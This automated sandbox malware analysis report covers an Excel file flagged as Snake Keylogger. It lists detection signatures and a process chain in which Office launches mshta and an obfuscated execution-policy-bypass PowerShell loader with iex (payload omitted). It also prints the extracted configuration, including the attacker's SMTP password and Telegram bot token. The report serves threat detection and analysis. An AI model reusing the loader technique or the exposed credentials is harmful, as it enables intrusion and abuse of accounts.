Windows
Analysis Report
SYSN ORDER.xls
Overview
General Information
Detection
Snake Keylogger
Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3344, cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 3624, cmdline: C:\Windows\System32\mshta.exe -Embedding, MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 3712, cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX( ... )" [obfuscated PowerShell with embedded Base64 payload omitted], MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 3736, cmdline: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX( ... ) [obfuscated PowerShell with embedded Base64 payload omitted], MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3844, cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3852, cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP", MD5: C877CBB966EA5939AA2A17B6A5160950)
- dllhost.exe (PID: 3944, cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe", MD5: 7F0098DCC054A27F80296ADF300573EC)
- RegSvcs.exe (PID: 3108, cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe", MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
- mshta.exe (PID: 3996, cmdline: C:\Windows\System32\mshta.exe -Embedding, MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 2672, cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX( ... )" [obfuscated PowerShell with embedded Base64 payload omitted], MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 2108, cmdline: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX( ... ) [obfuscated PowerShell with embedded Base64 payload omitted], MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 1692, cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline", MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 1976, cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP", MD5: C877CBB966EA5939AA2A17B6A5160950)
- dllhost.exe (PID: 1960, cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe", MD5: 7F0098DCC054A27F80296ADF300573EC)
- RegSvcs.exe (PID: 3176, cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe", MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | |
{"Exfil Mode": "Telegram", "Username": "teilecar@teilecar.com", "Password": "Manta924porsche=911", "Host": "mail.teilecar.com", "Port": "587", "Token": "7999924339:AAGXruqvzq9xMXJCD4qt4gTPOUJ8WiZw7pY", "Chat_id": "6183379562", "Version": "5.1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | |
| JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | |
| JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | |
| JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
System Summary
Source | Author |
---|---|
| Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) |
| Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) |
| Michael Haag |